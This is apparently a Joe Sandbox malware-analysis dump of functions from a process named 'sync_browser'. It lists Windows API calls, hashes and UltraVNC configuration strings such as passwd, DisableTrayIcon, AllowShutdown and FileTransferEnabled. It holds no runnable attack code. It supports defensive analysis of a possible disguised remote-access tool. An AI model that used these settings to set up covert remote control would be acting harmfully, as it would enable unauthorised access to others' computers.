Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0A6
Part of subcall function 00007FF7D593A040: MessageBoxA.USER32 ref: 00007FF7D593A0B7
Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0C2
Part of subcall function 00007FF7D593A040: CloseDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0CB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5938309
wsprintfA.USER32 ref: 00007FF7D5938320
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D5938340
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D593835B
wsprintfA.USER32 ref: 00007FF7D5938372
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D5938392
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D59383C1
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D59383F0
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D593841F
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D593843B
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D5938457
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D5938473
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D593848E
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D59384AB
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D59384C8
wsprintfA.USER32 ref: 00007FF7D59384E1
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D5938501

Strings

AllowProperties, xrefs: 00007FF7D5938A33, 00007FF7D5938AC3
XDMCPConnect, xrefs: 00007FF7D5938DAF, 00007FF7D5938ED9
LocalInputsDisabled, xrefs: 00007FF7D59392B0, 00007FF7D59393B6
UseDSMPlugin, xrefs: 00007FF7D59387C5, 00007FF7D593885F
QueryAccept, xrefs: 00007FF7D59390AD, 00007FF7D5939177
Avilog, xrefs: 00007FF7D5938594, 00007FF7D59386C8
clearconsole, xrefs: 00007FF7D5939308, 00007FF7D593945B
BlankInputsOnly, xrefs: 00007FF7D5938B70, 00007FF7D5938CB4
PollFullScreen, xrefs: 00007FF7D59394C8, 00007FF7D59396B5
LoopbackOnly, xrefs: 00007FF7D5938653, 00007FF7D59387AD
OnlyPollConsole, xrefs: 00007FF7D59394E5, 00007FF7D59396EC
DebugMode, xrefs: 00007FF7D5938579, 00007FF7D5938691
Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission., xrefs: 00007FF7D59382C5
locdom1, xrefs: 00007FF7D593847D, 00007FF7D59384F3
path, xrefs: 00007FF7D59385C3, 00007FF7D59386E8
InputsEnabled, xrefs: 00007FF7D5939278, 00007FF7D5939348
OnlyPollOnEvent, xrefs: 00007FF7D5939506, 00007FF7D5939723
QueryIfNoLogon, xrefs: 00007FF7D59390CA, 00007FF7D59391AE
MSLogonRequired, xrefs: 00007FF7D59382E8, 00007FF7D5938332
AuthHosts, xrefs: 00007FF7D593895B, 00007FF7D593899F
TurboMode, xrefs: 00007FF7D5939473, 00007FF7D5939610
DebugLevel, xrefs: 00007FF7D593861B, 00007FF7D593873F
DSMPluginConfig, xrefs: 00007FF7D59389CD, 00007FF7D59389F5
PollForeground, xrefs: 00007FF7D59394AB, 00007FF7D593967E
QuerySetting, xrefs: 00007FF7D5939075, 00007FF7D5939109
RemoveWallpaper, xrefs: 00007FF7D5938FCD, 00007FF7D5939026
BlankMonitorEnabled, xrefs: 00007FF7D5938B50, 00007FF7D5938C7D
passwd2, xrefs: 00007FF7D5939225, 00007FF7D5939255
ConnectPriority, xrefs: 00007FF7D5938820, 00007FF7D5938904
HTTPPortNumber, xrefs: 00007FF7D5938E0D, 00007FF7D5938F7E
EnableDriver, xrefs: 00007FF7D593953F, 00007FF7D5939795
secondary, xrefs: 00007FF7D5938BCF, 00007FF7D5938D59
SocketConnect, xrefs: 00007FF7D5938D71, 00007FF7D5938E6B
FTUserImpersonation, xrefs: 00007FF7D5938B30, 00007FF7D5938C46
SingleWindow, xrefs: 00007FF7D593959B, 00007FF7D5939840
EnableHook, xrefs: 00007FF7D593955E, 00007FF7D59397CE
MaxCpu, xrefs: 00007FF7D5939521, 00007FF7D593975E, 00007FF7D5939878, 00007FF7D59398B2
AllowShutdown, xrefs: 00007FF7D5938A0D, 00007FF7D5938A8C
AllowLoopback, xrefs: 00007FF7D59387E0, 00007FF7D5938896
PortNumber, xrefs: 00007FF7D5938DEF, 00007FF7D5938F47
QueryTimeout, xrefs: 00007FF7D5939090, 00007FF7D5939140
group3, xrefs: 00007FF7D5938406, 00007FF7D5938462
SingleWindowName, xrefs: 00007FF7D59395CC, 00007FF7D5939860
AuthRequired, xrefs: 00007FF7D5938800, 00007FF7D59388CD
DSMPlugin, xrefs: 00007FF7D593892F, 00007FF7D5938986
passwd, xrefs: 00007FF7D59391CD, 00007FF7D59391F8
EnableJapInput, xrefs: 00007FF7D59392CD, 00007FF7D59393ED
DefaultScale, xrefs: 00007FF7D5938B8D, 00007FF7D5938CEB
admin, xrefs: 00007FF7D5938259, 00007FF7D59382A9, 00007FF7D59382EF, 00007FF7D5938339, 00007FF7D5938351, 00007FF7D593838B, 00007FF7D5938580, 00007FF7D593859B, 00007FF7D59385CF, 00007FF7D5938602, 00007FF7D5938622, 00007FF7D593863D, 00007FF7D593865A, 00007FF7D5938698, 00007FF7D59386CF, 00007FF7D59386EF, 00007FF7D593870F, 00007FF7D5938746, 00007FF7D593877D, 00007FF7D59387B4, 00007FF7D59387CC, 00007FF7D59387E7, 00007FF7D5938807, 00007FF7D5938827, 00007FF7D5938866, 00007FF7D593889D, 00007FF7D59388D4, 00007FF7D593890B, 00007FF7D5938936, 00007FF7D5938962, 00007FF7D593898D, 00007FF7D59389A6, 00007FF7D59389D4, 00007FF7D59389FC, 00007FF7D5938A14, 00007FF7D5938A3A, 00007FF7D5938A52, 00007FF7D5938A93, 00007FF7D5938ACA, 00007FF7D5938B01, 00007FF7D5938B19, 00007FF7D5938B37, 00007FF7D5938B57, 00007FF7D5938B77, 00007FF7D5938B94, 00007FF7D5938BB5, 00007FF7D5938BD6, 00007FF7D5938C16, 00007FF7D5938C4D, 00007FF7D5938C84, 00007FF7D5938CBB, 00007FF7D5938CF2, 00007FF7D5938D29, 00007FF7D5938D60, 00007FF7D5938D78, 00007FF7D5938D96, 00007FF7D5938DB6, 00007FF7D5938DDE, 00007FF7D5938DF6, 00007FF7D5938E14, 00007FF7D5938E32, 00007FF7D5938E72, 00007FF7D5938EA9, 00007FF7D5938EE0, 00007FF7D5938F17, 00007FF7D5938F4E, 00007FF7D5938F85, 00007FF7D5938FBC, 00007FF7D5938FD4, 00007FF7D5938FEF, 00007FF7D593902D, 00007FF7D5939064, 00007FF7D593907C, 00007FF7D5939097, 00007FF7D59390B4, 00007FF7D59390D1, 00007FF7D5939110, 00007FF7D5939147, 00007FF7D593917E, 00007FF7D59391B5, 00007FF7D593927F, 00007FF7D593929A, 00007FF7D59392B7, 00007FF7D59392D4, 00007FF7D59392F1, 00007FF7D593930F, 00007FF7D593934F, 00007FF7D5939386, 00007FF7D59393BD, 00007FF7D59393F4, 00007FF7D593942B, 00007FF7D5939462
poll, xrefs: 00007FF7D593947A, 00007FF7D5939495, 00007FF7D59394B2, 00007FF7D59394CF, 00007FF7D59394EC, 00007FF7D593950D, 00007FF7D5939528, 00007FF7D5939546, 00007FF7D5939565, 00007FF7D5939583, 00007FF7D59395A2, 00007FF7D59395D8, 00007FF7D5939617, 00007FF7D593964E, 00007FF7D5939685, 00007FF7D59396BC, 00007FF7D59396F3, 00007FF7D593972A, 00007FF7D5939765, 00007FF7D593979C, 00007FF7D59397D5, 00007FF7D593980E, 00007FF7D5939847, 00007FF7D5939867, 00007FF7D593987F, 00007FF7D59398B9
HTTPConnect, xrefs: 00007FF7D5938D8F, 00007FF7D5938EA2
NewMSLogon, xrefs: 00007FF7D593834A, 00007FF7D5938384
AllowEditClients, xrefs: 00007FF7D5938A4B, 00007FF7D5938AFA
RemoveAero, xrefs: 00007FF7D5938FE8, 00007FF7D593905D
primary, xrefs: 00007FF7D5938BAE, 00007FF7D5938D22
PollUnderCursor, xrefs: 00007FF7D593948E, 00007FF7D5939647
UltraVNC, xrefs: 00007FF7D59391D4, 00007FF7D59391FF, 00007FF7D593922C, 00007FF7D593925C
group1, xrefs: 00007FF7D59383A8, 00007FF7D593842A
group2, xrefs: 00007FF7D59383D7, 00007FF7D5938446
accept_reject_mesg, xrefs: 00007FF7D59385FB, 00007FF7D5938708
admin_auth, xrefs: 00007FF7D59383AF, 00007FF7D59383DE, 00007FF7D593840D, 00007FF7D5938431, 00007FF7D593844D, 00007FF7D5938469, 00007FF7D5938484, 00007FF7D593849F, 00007FF7D59384BC, 00007FF7D59384FA, 00007FF7D5938531, 00007FF7D5938568
IdleTimeout, xrefs: 00007FF7D5938E2B, 00007FF7D5938FB5
AutoPortSelect, xrefs: 00007FF7D5938DD7, 00007FF7D5938F10
EnableVirtual, xrefs: 00007FF7D593957C, 00007FF7D5939807
LockSetting, xrefs: 00007FF7D5939293, 00007FF7D593937F
, xrefs: 00007FF7D59395DF
kickrdp, xrefs: 00007FF7D59392EA, 00007FF7D5939424
UseRegistry, xrefs: 00007FF7D5938252, 00007FF7D59382A2
locdom2, xrefs: 00007FF7D5938498, 00007FF7D593852A
DisableTrayIcon, xrefs: 00007FF7D5938636, 00007FF7D5938776
locdom3, xrefs: 00007FF7D59384B5, 00007FF7D5938561
FileTransferEnabled, xrefs: 00007FF7D5938B12, 00007FF7D5938C0F

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
API String ID: 634683900-3478490838
Opcode ID: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
Instruction ID: b22e14310bfb848fdfd4e2874df0e353468ed9480b1e3f0cbe6d1a3effc7deaf
Opcode Fuzzy Hash: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
Instruction Fuzzy Hash: F8E2DA75618A6BD6EB14AF64E850DECAB20FF85B48FC05033D91D57928DE7CE20AC760

Function 00007FF7D593E1D0 Relevance: 457.8, APIs: 190, Strings: 71, Instructions: 1023COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D59E7978: malloc.LIBCMT ref: 00007FF7D59E7992

Part of subcall function 00007FF7D59E7978: _callnewh.LIBCMT ref: 00007FF7D59E7986

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D593E253
wsprintfA.USER32 ref: 00007FF7D593E268
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D593E284
GetLastError.KERNEL32 ref: 00007FF7D593E28E
_itow.LIBCMT ref: 00007FF7D593E2A1

Part of subcall function 00007FF7D59E95C0: xtoa.LIBCMT ref: 00007FF7D59E95DC

Part of subcall function 00007FF7D593A040: OpenInputDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A07A
Part of subcall function 00007FF7D593A040: GetCurrentThreadId.KERNEL32 ref: 00007FF7D593A083
Part of subcall function 00007FF7D593A040: GetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A08B
Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0A6
Part of subcall function 00007FF7D593A040: MessageBoxA.USER32 ref: 00007FF7D593A0B7
Part of subcall function 00007FF7D593A040: SetThreadDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0C2
Part of subcall function 00007FF7D593A040: CloseDesktop.USER32(?,?,?,00007FF7D59382D7), ref: 00007FF7D593A0CB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D593E2E2
wsprintfA.USER32 ref: 00007FF7D593E2F7
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D593E313
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D593E32D
wsprintfA.USER32 ref: 00007FF7D593E342
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D593E35E
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D593E389
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D593E3B4
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D593E3DF
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D593E3F9
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D593E413
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D593E42D
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D593E447
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D593E463
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D593E47F
wsprintfA.USER32 ref: 00007FF7D593E496
WritePrivateProfileStringA.KERNEL32 ref: 00007FF7D593E4B2
wsprintfA.USER32 ref: 00007FF7D593E4C7

Strings

AllowProperties, xrefs: 00007FF7D593E91A, 00007FF7D593E9A5
XDMCPConnect, xrefs: 00007FF7D593ECB2, 00007FF7D593EDD1
LocalInputsDisabled, xrefs: 00007FF7D593F15E, 00007FF7D593F24F
UseDSMPlugin, xrefs: 00007FF7D593E731, 00007FF7D593E7C2
QueryAccept, xrefs: 00007FF7D593EF8A, 00007FF7D593F04A
Avilog, xrefs: 00007FF7D593E534, 00007FF7D593E64E
clearconsole, xrefs: 00007FF7D593F1B3, 00007FF7D593F2E2
BlankInputsOnly, xrefs: 00007FF7D593EA48, 00007FF7D593EB93
PollFullScreen, xrefs: 00007FF7D593F353, 00007FF7D593F535
LoopbackOnly, xrefs: 00007FF7D593E5E4, 00007FF7D593E71A
OnlyPollConsole, xrefs: 00007FF7D593F372, 00007FF7D593F566
DebugMode, xrefs: 00007FF7D593E51A, 00007FF7D593E620
locdom1, xrefs: 00007FF7D593E433, 00007FF7D593E4A1
path, xrefs: 00007FF7D593E55B, 00007FF7D593E669
InputsEnabled, xrefs: 00007FF7D593F125, 00007FF7D593F1F0
OnlyPollOnEvent, xrefs: 00007FF7D593F395, 00007FF7D593F597
QueryIfNoLogon, xrefs: 00007FF7D593EFA9, 00007FF7D593F078
MSLogonRequired, xrefs: 00007FF7D593E2BE, 00007FF7D593E302
AuthHosts, xrefs: 00007FF7D593E8A4, 00007FF7D593E8E3
TurboMode, xrefs: 00007FF7D593F2FE, 00007FF7D593F4A2
DebugLevel, xrefs: 00007FF7D593E5AE, 00007FF7D593E6B8
PollForeground, xrefs: 00007FF7D593F337, 00007FF7D593F504
QuerySetting, xrefs: 00007FF7D593EF4E, 00007FF7D593EFE5
RemoveWallpaper, xrefs: 00007FF7D593EEB4, 00007FF7D593EF06
BlankMonitorEnabled, xrefs: 00007FF7D593EA29, 00007FF7D593EB62
passwd2, xrefs: 00007FF7D593F0DF, 00007FF7D593F106
ConnectPriority, xrefs: 00007FF7D593E789, 00007FF7D593E855
HTTPPortNumber, xrefs: 00007FF7D593ED10, 00007FF7D593EE64
EnableDriver, xrefs: 00007FF7D593F3D1, 00007FF7D593F5FB
secondary, xrefs: 00007FF7D593EAC1, 00007FF7D593EC5A
SocketConnect, xrefs: 00007FF7D593EC76, 00007FF7D593ED6F
FTUserImpersonation, xrefs: 00007FF7D593EA0A, 00007FF7D593EB34
SingleWindow, xrefs: 00007FF7D593F433, 00007FF7D593F694
EnableHook, xrefs: 00007FF7D593F3F0, 00007FF7D593F62E
MaxCpu, xrefs: 00007FF7D593F3AC, 00007FF7D593F5C8
AllowShutdown, xrefs: 00007FF7D593E8FD, 00007FF7D593E974
AllowLoopback, xrefs: 00007FF7D593E74B, 00007FF7D593E7F3
PortNumber, xrefs: 00007FF7D593ECF6, 00007FF7D593EE33
QueryTimeout, xrefs: 00007FF7D593EF6B, 00007FF7D593F016
group3, xrefs: 00007FF7D593E3C1, 00007FF7D593E419
FileTransferTimeout, xrefs: 00007FF7D593EA84, 00007FF7D593EBF8
SingleWindowName, xrefs: 00007FF7D593F462, 00007FF7D593F6AF
AuthRequired, xrefs: 00007FF7D593E76A, 00007FF7D593E824
DSMPlugin, xrefs: 00007FF7D593E877, 00007FF7D593E8CC
passwd, xrefs: 00007FF7D593F094, 00007FF7D593F0B8
EnableJapInput, xrefs: 00007FF7D593F17A, 00007FF7D593F280
DefaultScale, xrefs: 00007FF7D593EA64, 00007FF7D593EBC4
admin, xrefs: 00007FF7D593E241, 00007FF7D593E27A, 00007FF7D593E2C5, 00007FF7D593E309, 00007FF7D593E320, 00007FF7D593E354, 00007FF7D593E521, 00007FF7D593E53B, 00007FF7D593E562, 00007FF7D593E594, 00007FF7D593E5B5, 00007FF7D593E5CF, 00007FF7D593E5EB, 00007FF7D593E627, 00007FF7D593E655, 00007FF7D593E670, 00007FF7D593E68E, 00007FF7D593E6BF, 00007FF7D593E6F0, 00007FF7D593E721, 00007FF7D593E738, 00007FF7D593E752, 00007FF7D593E771, 00007FF7D593E790, 00007FF7D593E7C9, 00007FF7D593E7FA, 00007FF7D593E82B, 00007FF7D593E85C, 00007FF7D593E87E, 00007FF7D593E8AB, 00007FF7D593E8D3, 00007FF7D593E8EA, 00007FF7D593E904, 00007FF7D593E921, 00007FF7D593E940, 00007FF7D593E97B, 00007FF7D593E9AC, 00007FF7D593E9DD, 00007FF7D593E9F4, 00007FF7D593EA11, 00007FF7D593EA30, 00007FF7D593EA4F, 00007FF7D593EA6B, 00007FF7D593EA8B, 00007FF7D593EAAB, 00007FF7D593EAC8, 00007FF7D593EB07, 00007FF7D593EB3B, 00007FF7D593EB69, 00007FF7D593EB9A, 00007FF7D593EBCB, 00007FF7D593EBFF, 00007FF7D593EC30, 00007FF7D593EC61, 00007FF7D593EC7D, 00007FF7D593EC9A, 00007FF7D593ECB9, 00007FF7D593ECD8, 00007FF7D593ECFD, 00007FF7D593ED17, 00007FF7D593ED37, 00007FF7D593ED76, 00007FF7D593EDA7, 00007FF7D593EDD8, 00007FF7D593EE09, 00007FF7D593EE3A, 00007FF7D593EE6B, 00007FF7D593EEA2, 00007FF7D593EEBB, 00007FF7D593EED5, 00007FF7D593EF0D, 00007FF7D593EF3E, 00007FF7D593EF55, 00007FF7D593EF72, 00007FF7D593EF91, 00007FF7D593EFB0, 00007FF7D593EFEC, 00007FF7D593F01D, 00007FF7D593F051, 00007FF7D593F07F, 00007FF7D593F12C, 00007FF7D593F149, 00007FF7D593F165, 00007FF7D593F181, 00007FF7D593F19D, 00007FF7D593F1BA, 00007FF7D593F1F7, 00007FF7D593F225, 00007FF7D593F256, 00007FF7D593F287, 00007FF7D593F2B8, 00007FF7D593F2E9
poll, xrefs: 00007FF7D593F305, 00007FF7D593F322, 00007FF7D593F33E, 00007FF7D593F35A, 00007FF7D593F379, 00007FF7D593F39C, 00007FF7D593F3B3, 00007FF7D593F3D8, 00007FF7D593F3F7, 00007FF7D593F41A, 00007FF7D593F43A, 00007FF7D593F46E, 00007FF7D593F4A9, 00007FF7D593F4DA, 00007FF7D593F50B, 00007FF7D593F53C, 00007FF7D593F56D, 00007FF7D593F59E, 00007FF7D593F5CF, 00007FF7D593F602, 00007FF7D593F635, 00007FF7D593F668, 00007FF7D593F69B, 00007FF7D593F6B6
HTTPConnect, xrefs: 00007FF7D593EC93, 00007FF7D593EDA0
NewMSLogon, xrefs: 00007FF7D593E319, 00007FF7D593E34D
AllowEditClients, xrefs: 00007FF7D593E939, 00007FF7D593E9D6
RemoveAero, xrefs: 00007FF7D593EECE, 00007FF7D593EF37
primary, xrefs: 00007FF7D593EAA4, 00007FF7D593EC29
PollUnderCursor, xrefs: 00007FF7D593F31B, 00007FF7D593F4D3
UltraVNC, xrefs: 00007FF7D593F09B, 00007FF7D593F0BF, 00007FF7D593F0E6, 00007FF7D593F10D
group1, xrefs: 00007FF7D593E36B, 00007FF7D593E3E5
group2, xrefs: 00007FF7D593E396, 00007FF7D593E3FF
accept_reject_mesg, xrefs: 00007FF7D593E58D, 00007FF7D593E687
admin_auth, xrefs: 00007FF7D593E372, 00007FF7D593E39D, 00007FF7D593E3C8, 00007FF7D593E3EC, 00007FF7D593E406, 00007FF7D593E420, 00007FF7D593E43A, 00007FF7D593E454, 00007FF7D593E478, 00007FF7D593E4A8, 00007FF7D593E4D9, 00007FF7D593E50A
, xrefs: 00007FF7D593F475
IdleTimeout, xrefs: 00007FF7D593ED30, 00007FF7D593EE9B
AutoPortSelect, xrefs: 00007FF7D593ECD1, 00007FF7D593EE02
EnableVirtual, xrefs: 00007FF7D593F413, 00007FF7D593F661
LockSetting, xrefs: 00007FF7D593F142, 00007FF7D593F21E
kickrdp, xrefs: 00007FF7D593F196, 00007FF7D593F2B1
UseRegistry, xrefs: 00007FF7D593E23A, 00007FF7D593E273
locdom2, xrefs: 00007FF7D593E44D, 00007FF7D593E4D2
DisableTrayIcon, xrefs: 00007FF7D593E5C8, 00007FF7D593E6E9
locdom3, xrefs: 00007FF7D593E471, 00007FF7D593E503
FileTransferEnabled, xrefs: 00007FF7D593E9ED, 00007FF7D593EB00

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
API String ID: 341937111-959611688
Opcode ID: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
Instruction ID: fe36d863d6eaf238ad951447a615f62b529496d85b5f8f8d80c4db0e54547e16
Opcode Fuzzy Hash: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
Instruction Fuzzy Hash: 76C2EB65A1892797EA04AB65E850CADAB60FFC5F88FC05433DD1D53928EE7CE209C770

Function 00007FF7D5963E20 Relevance: 158.0, APIs: 55, Strings: 35, Instructions: 537libraryloaderthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF7D5963E6A
GetCurrentThreadId.KERNEL32 ref: 00007FF7D5963E94
GetThreadDesktop.USER32 ref: 00007FF7D5963E9C
GetUserObjectInformationA.USER32 ref: 00007FF7D5963EC7
SetThreadDesktop.USER32 ref: 00007FF7D5963F0F
LoadLibraryA.KERNEL32 ref: 00007FF7D5963F35
GetProcAddress.KERNEL32 ref: 00007FF7D5963F45
GetStockObject.GDI32 ref: 00007FF7D5963FD2
RegisterClassExA.USER32 ref: 00007FF7D5963FEC
SetEvent.KERNEL32 ref: 00007FF7D596401A
CreateWindowExA.USER32 ref: 00007FF7D5964074
SetTimer.USER32 ref: 00007FF7D59640A1
SetWindowLongPtrA.USER32 ref: 00007FF7D59640B6
SetClipboardViewer.USER32 ref: 00007FF7D59640CB
CreateThread.KERNEL32 ref: 00007FF7D5964130
CloseHandle.KERNEL32 ref: 00007FF7D596413E
GetModuleFileNameA.KERNEL32 ref: 00007FF7D596416C
GetModuleFileNameA.KERNEL32 ref: 00007FF7D59641D0
GetModuleFileNameA.KERNEL32 ref: 00007FF7D5964242
LoadLibraryA.KERNEL32 ref: 00007FF7D59642D2
LoadLibraryA.KERNEL32 ref: 00007FF7D59642E6
LoadLibraryA.KERNEL32 ref: 00007FF7D5964302
GetProcAddress.KERNEL32 ref: 00007FF7D5964342
GetProcAddress.KERNEL32 ref: 00007FF7D596435D
GetProcAddress.KERNEL32 ref: 00007FF7D5964378
GetProcAddress.KERNEL32 ref: 00007FF7D5964393
GetProcAddress.KERNEL32 ref: 00007FF7D59643B3
GetProcAddress.KERNEL32 ref: 00007FF7D59643CE
GetProcAddress.KERNEL32 ref: 00007FF7D59643E9
GetProcAddress.KERNEL32 ref: 00007FF7D5964404
GetProcAddress.KERNEL32 ref: 00007FF7D5964439
GetProcAddress.KERNEL32 ref: 00007FF7D5964454
GetProcAddress.KERNEL32 ref: 00007FF7D596446F
SetEvent.KERNEL32 ref: 00007FF7D5964498
PeekMessageA.USER32 ref: 00007FF7D59644D4
Sleep.KERNEL32 ref: 00007FF7D5964675
CreateRectRgn.GDI32 ref: 00007FF7D596469F
CombineRgn.GDI32 ref: 00007FF7D59646BB
DeleteObject.GDI32 ref: 00007FF7D59646C4
free.LIBCMT ref: 00007FF7D59646CD
SetEvent.KERNEL32 ref: 00007FF7D59646D9

Part of subcall function 00007FF7D5947350: TryEnterCriticalSection.KERNEL32 ref: 00007FF7D5947368
Part of subcall function 00007FF7D5947350: LeaveCriticalSection.KERNEL32 ref: 00007FF7D594749A

SetEvent.KERNEL32 ref: 00007FF7D596472D
SetEvent.KERNEL32 ref: 00007FF7D5964754
TranslateMessage.USER32 ref: 00007FF7D5964780
DispatchMessageA.USER32 ref: 00007FF7D596478A
WaitMessage.USER32 ref: 00007FF7D5964795
DestroyWindow.USER32 ref: 00007FF7D59647BC
DestroyWindow.USER32 ref: 00007FF7D59647E0
SetEvent.KERNEL32 ref: 00007FF7D59647ED
KillTimer.USER32 ref: 00007FF7D59647FF
FreeLibrary.KERNEL32 ref: 00007FF7D5964829
